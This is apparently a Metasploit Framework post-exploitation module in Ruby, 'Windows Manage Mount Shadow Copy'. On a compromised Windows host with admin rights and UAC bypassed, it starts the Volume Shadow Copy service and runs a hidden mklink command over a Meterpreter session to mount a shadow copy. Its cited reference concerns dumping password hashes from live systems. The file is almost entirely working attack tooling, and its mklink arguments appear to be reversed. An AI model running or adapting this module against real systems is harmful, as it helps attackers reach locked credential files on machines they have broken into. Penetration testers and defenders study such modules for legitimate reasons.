##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'

class Metasploit3 < Msf::Post

	include Msf::Post::Windows::Priv
	include Msf::Post::Windows::ShadowCopy

	def initialize(info={})
		super(update_info(info,
			'Name'                 => "Windows Manage Mount Shadow Copy",
			'Description'          => %q{
				This module will attempt to mount a Volume Shadow Copy
				on the system. This is based on the VSSOwn Script
				originally posted by Tim Tomes and Mark Baggett.

				Works on win2k3 and later.
				},
			'License'              => MSF_LICENSE,
			'Platform'             => ['win'],
			'SessionTypes'         => ['meterpreter'],
			'Author'               => ['theLightCosine'],
			'References'    => [
				[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
			]
		))
		register_options(
			[
				OptString.new('DEVICE', [ true, 'DeviceObject of Shadowcopy to mount.' ]),
				OptString.new('PATH', [ true, 'Path to mount it to.' ])
			], self.class)

	end


	def run
		unless is_admin?
			print_error("This module requires admin privs to run")
			return
		end
		if is_uac_enabled?
			print_error("This module requires UAC to be bypassed first")
			return
		end
		unless start_vss
			return
		end

		r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true})

	end

end